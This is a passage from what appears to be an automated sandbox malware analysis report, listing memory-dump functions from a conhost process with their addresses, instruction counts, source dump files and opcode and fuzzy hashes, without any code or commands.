                                                            • Instruction Fuzzy Hash: 3B213731A1994E9FDB98DF98C4B45EDBBB1FF59300F14013AD50AE3291DA39A905DB40
                                                            Function 00007FFD34DC3370 Relevance: .1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3579944171.00007FFD34DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34DC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34dc0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e72fe065a319769f42911dc33c6730d656b87ed26497b30f3ebffd791c13ae6b
                                                            • Instruction ID: 279bb04ad6ccde264925c2137529bd71fd611aabf0b69be45122e65de9996432
                                                            • Opcode Fuzzy Hash: e72fe065a319769f42911dc33c6730d656b87ed26497b30f3ebffd791c13ae6b
                                                            • Instruction Fuzzy Hash: 4E117F6094E3C15FC71387785D654A47FE4AF5722571A86EBC488CF8A3CA4D484AC3A3
                                                            Function 00007FFD34CA6DD0 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 587063bde09029cadf236cd0686f185a0e6ad7b90427bc753349d64da2790573
                                                            • Instruction ID: 3d7b3a5a04e8e0cea07cee816a664bc9afa557e183aa820869ec5e1b414225ae
                                                            • Opcode Fuzzy Hash: 587063bde09029cadf236cd0686f185a0e6ad7b90427bc753349d64da2790573
                                                            • Instruction Fuzzy Hash: 84118710B1D46786E6AC8708C4F85BC7291FF92701B244677D6DBCB5AAC82CF981A7C0
                                                            Function 00007FFD34CA1D80 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e568b5b83e02dd101a2988bfba2eec68532d6b3d43e71469bbd0e2867a742ded
                                                            • Instruction ID: ba88077120f339f646be81d10aa40786131885d28452518391d175d16d4a46ea
                                                            • Opcode Fuzzy Hash: e568b5b83e02dd101a2988bfba2eec68532d6b3d43e71469bbd0e2867a742ded
                                                            • Instruction Fuzzy Hash: 38118710B1D4A686F7AD860894F45BC7291FF96305B14467BD59BCB5CACC2CF981B780
                                                            Function 00007FFD34CA5149 Relevance: .1, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10a729fcdc9f65e971ce45b706c00f829498a07236ec07cd3aeb779946c60d43
                                                            • Instruction ID: 5877f51f91e889eac346b8c0497d98b2a62c493d2cbd257ca9f9418999751d5e
                                                            • Opcode Fuzzy Hash: 10a729fcdc9f65e971ce45b706c00f829498a07236ec07cd3aeb779946c60d43
                                                            • Instruction Fuzzy Hash: BF110326A0E68A5FE7E095A488A82BD37F1EF87300F01007BE209D7283CE6C28059390
                                                            Function 00007FFD34CA0233 Relevance: .1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4c74a6d05f4aa2c62c2fc7faa19011ebfe4870ee484f88e938c3fae2d9553e50
                                                            • Instruction ID: 274ea104c19a9f25144df7e5fc99977af0b9e4965dde65ca0e85b0763c93fe38
                                                            • Opcode Fuzzy Hash: 4c74a6d05f4aa2c62c2fc7faa19011ebfe4870ee484f88e938c3fae2d9553e50
                                                            • Instruction Fuzzy Hash: 19114231B189099FDB54EA5CA4A15B8F3E1EF49354B14427AD14ED3685CE28BC12D780
                                                            Function 00007FFD34CA5E50 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4ce6014c61d459b2be4c097d56fb9b9cd7a1d793ec5b5d1913b924664d312128
                                                            • Instruction ID: 7f8ecb352d70f21c5046ad2267949d60eeb4009d194a9bd030e1ca70363ec8cf
                                                            • Opcode Fuzzy Hash: 4ce6014c61d459b2be4c097d56fb9b9cd7a1d793ec5b5d1913b924664d312128
                                                            • Instruction Fuzzy Hash: 0811A031B1990A9BEBA4EE9590A15F973A1EF59221F40467ED14FC36C2CE3CB805D390
                                                            Function 00007FFD34CA0E00 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 857370ecbc239ac72f0a5e5dbf91ce91937c19e43d488253d548afd7992dd3a4
                                                            • Instruction ID: a89fd8c7dd58203b856b08df9bdfe9759bcdf3c993b78be4f93f02d8a928dc72
                                                            • Opcode Fuzzy Hash: 857370ecbc239ac72f0a5e5dbf91ce91937c19e43d488253d548afd7992dd3a4
                                                            • Instruction Fuzzy Hash: CB119E20B1890A5BEBA4AE9690A25FA73A1EF59255F00067ED14EC35C2DE3CB805D390
                                                            Function 00007FFD348B0C38 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43866b6c94a3d8e42c7ceb931c0348737b4e93f9e8e61276f13f671354e7e212
                                                            • Instruction ID: 3156e41ba4909368740d6bee8e92eb440faad0ac713325e6336dc9b8cd247d97
                                                            • Opcode Fuzzy Hash: 43866b6c94a3d8e42c7ceb931c0348737b4e93f9e8e61276f13f671354e7e212
                                                            • Instruction Fuzzy Hash: 80119E35B0E68D8EE7139B6888B11AD7BA0EF53310F1545B6C144DB192DE7C660697C1
                                                            Function 00007FFD34CA5CCE Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b7071d50094dbead808886141f35734e42d200159ff6480fd7d7d9445c9e1f7d
                                                            • Instruction ID: 135b773418d9cfb38d381d19bcbc2b845eae014c978f7ad1150303d8611395b9
                                                            • Opcode Fuzzy Hash: b7071d50094dbead808886141f35734e42d200159ff6480fd7d7d9445c9e1f7d
                                                            • Instruction Fuzzy Hash: 4401C4317055079BEB94AE48E4A12E973A5EB95325F10427BDA0EC36C1DB7DA850C780
                                                            Function 00007FFD34CA0C7E Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 135e6e22b30d77430c6d3fc326a0fe05e228f714105db3955f995f9c35899432
                                                            • Instruction ID: 7dfdb19b8198e78f334e84cf7ae08333912942965cec67542b8e5bd0d09ed9da
                                                            • Opcode Fuzzy Hash: 135e6e22b30d77430c6d3fc326a0fe05e228f714105db3955f995f9c35899432
                                                            • Instruction Fuzzy Hash: 4701C03170550B9FEB58AE49E4A12F973A5EB963A5F10027BD60EC36C0DF69A850C790
                                                            Function 00007FFD348B5721 Relevance: .1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eba8a8ac8be0f5ea5e9a4bc5641eae0c4af192f67fb60dc548c03b894b44a47e
                                                            • Instruction ID: 88a144cc7a5ab2d9541073716870a85c9d483050f25b872875b79b35fe0fb946
                                                            • Opcode Fuzzy Hash: eba8a8ac8be0f5ea5e9a4bc5641eae0c4af192f67fb60dc548c03b894b44a47e
                                                            • Instruction Fuzzy Hash: 1D11DD71B08A09CFDB98DB44C494BAD77F2EB58315F15416AC40ED7290CF79A981DF48
                                                            Function 00007FFD348B0C40 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cc90987e7310b98e75f9564d28927b7dec4b0d6eeebd5fc4e2af21546566306e
                                                            • Instruction ID: 712c9a87abc59480b90db644c00259f4adf89bffa35cc7a9c29fdbe9e0f719ee
                                                            • Opcode Fuzzy Hash: cc90987e7310b98e75f9564d28927b7dec4b0d6eeebd5fc4e2af21546566306e
                                                            • Instruction Fuzzy Hash: 33118B35A0E68D8FE713DB6888B10AD7BB0EF53310F1541B6C144DB192DE7CA64AAB81
                                                            Function 00007FFD34CA3A90 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8b1a8a7ebbe70ee2366fb51ea4e7ce6a06f90e299d788adc6dfd48910260a1a8
                                                            • Instruction ID: 9dfe577e2c4574e8b618cdabec6e4f2f1ccff59b952da8c16621e3d263e1f592
                                                            • Opcode Fuzzy Hash: 8b1a8a7ebbe70ee2366fb51ea4e7ce6a06f90e299d788adc6dfd48910260a1a8
                                                            • Instruction Fuzzy Hash: 94F0683170C5094FEBA8AE5CA4262BD73D1EF99221B10017FE54EC3661DE6558428781
                                                            Function 00007FFD34CA40A9 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 17d83556d1b420042151453389bd63bccb69b7d6464c28ed9b217d34848a14a2
                                                            • Instruction ID: 1f22a47e005eea24f459b7c811a669148852cf20fb2e88ceb324f3ef8c98da55
                                                            • Opcode Fuzzy Hash: 17d83556d1b420042151453389bd63bccb69b7d6464c28ed9b217d34848a14a2
                                                            • Instruction Fuzzy Hash: 2E01ED7090895D8FDB98DF88C4A4AACB7F1FF59301F14017ED04DE7691CA35A840DB05
                                                            Function 00007FFD348B0C50 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ecf3841aa623fa1b35a2eea945f96a19c38413566017df3c343223bca42b29cd
                                                            • Instruction ID: c0f9a6284258d6d90449cdae7da6f3e2ed25fd9b212614c2871a2d786d00d2e9
                                                            • Opcode Fuzzy Hash: ecf3841aa623fa1b35a2eea945f96a19c38413566017df3c343223bca42b29cd
                                                            • Instruction Fuzzy Hash: 52017C34E0E2899FEB12DB6888A409D7FB0EF03300F1441F6D544DB192DE7CAA459781
                                                            Function 00007FFD34CA44B2 Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8c978aef2215d5c8624c3c8e88015dab031cad285587db919819a9cd599dd5b0
                                                            • Instruction ID: 6d2e2d30142683a86009fd8221a80d7658625cd4502c83d520eeae79deb38f48
                                                            • Opcode Fuzzy Hash: 8c978aef2215d5c8624c3c8e88015dab031cad285587db919819a9cd599dd5b0
                                                            • Instruction Fuzzy Hash: 2DF0963144E3C59FE752CB7088A25E93FF4AF43218F1900FBD546C70A2C66C5656D761
                                                            Function 00007FFD348C4AB0 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348c0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b8c5844df8ea381d159120fea82c5e848038404ff143cd81fda6ef7b2b20065f
                                                            • Instruction ID: cd8c31561687749dfeb71958535db18c8a0aae71e62d107a303cf27dbe4cb50d
                                                            • Opcode Fuzzy Hash: b8c5844df8ea381d159120fea82c5e848038404ff143cd81fda6ef7b2b20065f
                                                            • Instruction Fuzzy Hash: 05F05430B1C90B4FF6199B0C99E06B97291EF56710F508172D61FC31D6ED3CED816688
                                                            Function 00007FFD348C42D9 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348c0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ddafa383a9537491175873eaf08ed037539edf36abce0c6c6777c10d87ca6e18
                                                            • Instruction ID: 2f73b8d6852a379e16d5c4bdcce7344ac9d68747d44509a7a6fe8bb3388c362a
                                                            • Opcode Fuzzy Hash: ddafa383a9537491175873eaf08ed037539edf36abce0c6c6777c10d87ca6e18
                                                            • Instruction Fuzzy Hash: 8FF08131B0840E8BF710DB84C8A49BEB7A1EF51710F10063BC11AD7289CEBC69818680
                                                            Function 00007FFD348B4635 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction ID: ccede96e88bc7e0a21b6ca1f725839310230ca55dd1c7de19ccbd3975723da9f
                                                            • Opcode Fuzzy Hash: f08ae8a61e808b57d8b254018537c510135bb68dfaf9b0d31c658a02ae44dada
                                                            • Instruction Fuzzy Hash: 64F0EC30A1CA1E8EFB55EB40C8E57F87361FB97701F5041B5C60AD72A5DFAC69809A81
                                                            Function 00007FFD34CA5CA8 Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3034106c2aa6f2585daf8fe0ae5beb6c7eb9d92fd9230c5f89ce0cf66b03dfff
                                                            • Instruction ID: b899b87687a3cbc6dc9d153f78101e863eddab8ebd1d3629f6c93f9a3476c33e
                                                            • Opcode Fuzzy Hash: 3034106c2aa6f2585daf8fe0ae5beb6c7eb9d92fd9230c5f89ce0cf66b03dfff
                                                            • Instruction Fuzzy Hash: 73F08221F0F5079AFAE55644A4B12BD3264AF5B315F21813BC70FC66C7DD2D6411A391
                                                            Function 00007FFD34CA51AA Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 09de3b50557bfab5b8d5c9089b2de674435c5e4ac2674bccf5fcf6943c522f2d
                                                            • Instruction ID: 7133fa64615b5a039e0e2a983965bc76253347a811f0b511ef56707a2f5fd5a2
                                                            • Opcode Fuzzy Hash: 09de3b50557bfab5b8d5c9089b2de674435c5e4ac2674bccf5fcf6943c522f2d
                                                            • Instruction Fuzzy Hash: 02F0C226A0E2824FEBD29A6088E41A83BF0DF1731071945FAC684CB1D7D5AC3405E311
                                                            Function 00007FFD348B45BC Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction ID: 303be9dbd397d72052ab4426d3bdc686c0a49139f0a662adfa975f5fce6681dd
                                                            • Opcode Fuzzy Hash: 508c79c546175c05d1438037ebf3d7b8e117274a0c6f02f7415c70eb6e0241bd
                                                            • Instruction Fuzzy Hash: BBF05E30B0CA0A4EFB90EB00C8E57F82391FF57700F108175CA4ED72A2DEAC69409AC0
                                                            Function 00007FFD348DCB99 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348d3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c5cc8c3c1a3bfa48b94278ab006bbbede4072231905a33c6f186732b74faf9b
                                                            • Instruction ID: 989b8fce73b684103055b26c55621fc25bf41651d12cf89ef1dfb12e57f0f706
                                                            • Opcode Fuzzy Hash: 6c5cc8c3c1a3bfa48b94278ab006bbbede4072231905a33c6f186732b74faf9b
                                                            • Instruction Fuzzy Hash: 25F06D6096D7C44FC302AB388C640247FF0EE5B20578A02EBC0C5CA5B3EA198946C352
                                                            Function 00007FFD348CA78B Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348c0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52df578212ef37111171d860d2f6520e736102da9798810a525db4f9a565f372
                                                            • Instruction ID: d0a85f0f841cce9e3bf40048fcdfd84f70198c90e7f4475f3a6fef0321459cf3
                                                            • Opcode Fuzzy Hash: 52df578212ef37111171d860d2f6520e736102da9798810a525db4f9a565f372
                                                            • Instruction Fuzzy Hash: B9F01221B199594FEAD4EB5884B5678A2D2FF59300F1405B6D50DD7282CD38BC419B40
                                                            Function 00007FFD348D9619 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348d3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b2d73afd36937a51db99eb8caae32cf883d9b057ab269fef98245fcdbffeb58
                                                            • Instruction ID: 656970dfed9a4d588b913da2e8751fd6ed58901285d9920c190bdbcfc391a764
                                                            • Opcode Fuzzy Hash: 6b2d73afd36937a51db99eb8caae32cf883d9b057ab269fef98245fcdbffeb58
                                                            • Instruction Fuzzy Hash: 25E0862164A7C44FC70EA7788C699503FB1DF6B21178A40DBC045CB6B3E91DCC49C752
                                                            Function 00007FFD348B06F2 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba2f3f92184f182f338acf42b39db2ed5b56f7122f755129703fc215452fb655
                                                            • Instruction ID: 0e1ac431929f476acabd6338b9bf160cda12f825b496f6581b6df297c8901bf1
                                                            • Opcode Fuzzy Hash: ba2f3f92184f182f338acf42b39db2ed5b56f7122f755129703fc215452fb655
                                                            • Instruction Fuzzy Hash: F7E0DF01E4E78A0EE60322BD14F60AD7A141F93214F9801B2C64DD60A3BCCE309826A2
                                                            Function 00007FFD348C3E50 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348c0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                            • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                            • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                            • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                            Function 00007FFD348B2E4C Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction ID: ad0b291874e62b9b7d13df6e15b7efe3e4b269c6aba3380eaa1ab2a98312651c
                                                            • Opcode Fuzzy Hash: 1a23117acbdbf760f00117a47373b727a4dbe263c9162e5cb3da5fb5f26b28c5
                                                            • Instruction Fuzzy Hash: A9E01260F0D4064AFB94A744D4A17A96255DB4A310F140078DB4ED33C1CD6CAD409B86
                                                            Function 00007FFD348B06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction ID: 9e861f3e439aaf853c8f11a22adbb079205d10f98cd7a304199f1e10a4677264
                                                            • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction Fuzzy Hash: 60C04C05F5E61F09B815776E58E60ACA1409BD7610FD50172D74DD00D19CCD24D921D6
                                                            Function 00007FFD348B12B0 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3564997132.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd348b0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction ID: 386651720350b0619f7d7d9a3cfaa5a0b8af7bb539c6fe2dbe72a98b27a909b0
                                                            • Opcode Fuzzy Hash: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction Fuzzy Hash: 7BC04C345518099FC948EB29C89595477A0FB1A315BD50094E409C7171D65AECD5D781
                                                            Function 00007FFD34CA0C5B Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.3575828391.00007FFD34CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ffd34ca0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c5a7bb0cad772a8a1714670478efcfc73a73c16a08499eddb5c965bec1d36a2
                                                            • Instruction ID: 318d0560390dcb834ecf2f51f545181193a582853a53cdf06b89bec213e2bf8f
                                                            • Opcode Fuzzy Hash: 1c5a7bb0cad772a8a1714670478efcfc73a73c16a08499eddb5c965bec1d36a2
